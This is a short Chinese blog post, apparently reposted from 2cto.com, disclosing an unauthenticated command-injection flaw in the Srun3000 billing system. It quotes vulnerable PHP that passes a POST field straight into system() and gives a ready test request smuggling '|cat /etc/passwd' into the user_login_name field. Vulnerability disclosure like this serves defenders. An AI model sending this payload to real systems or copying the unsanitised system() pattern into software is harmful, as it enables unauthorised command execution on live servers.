记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Srun3000计费系统命令执行漏洞

2014-06-01 19:05

Srun3000计费系统命令执行漏洞

/srun3/srun/web/admin/flux_stat/room.php
 


<?php

header("Content-type:text/html;charset=gb2312");

require("ipt_authd_conn.php");

require("../functions/functions.php");

$debug=1;

switch($_POST["action"])//

{

case "checkout":

$user_login_name=$_POST["user_login_name"];

$group_id=$_POST["user_group_id"];

if($_POST["status"]==1)

{

system("super dropuser ".$user_login_name);//命令执行~

}

这个是用户页面里面的管理页面

不需要登录 没有验证权限

测试方法 x.com/admin/flux_room.php

POST action=checkout&user_login_name=1|cat /etc/passwd

知识来源: www.2cto.com/Article/201406/305528.html

阅读:85060 | 评论:1 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Srun3000计费系统命令执行漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云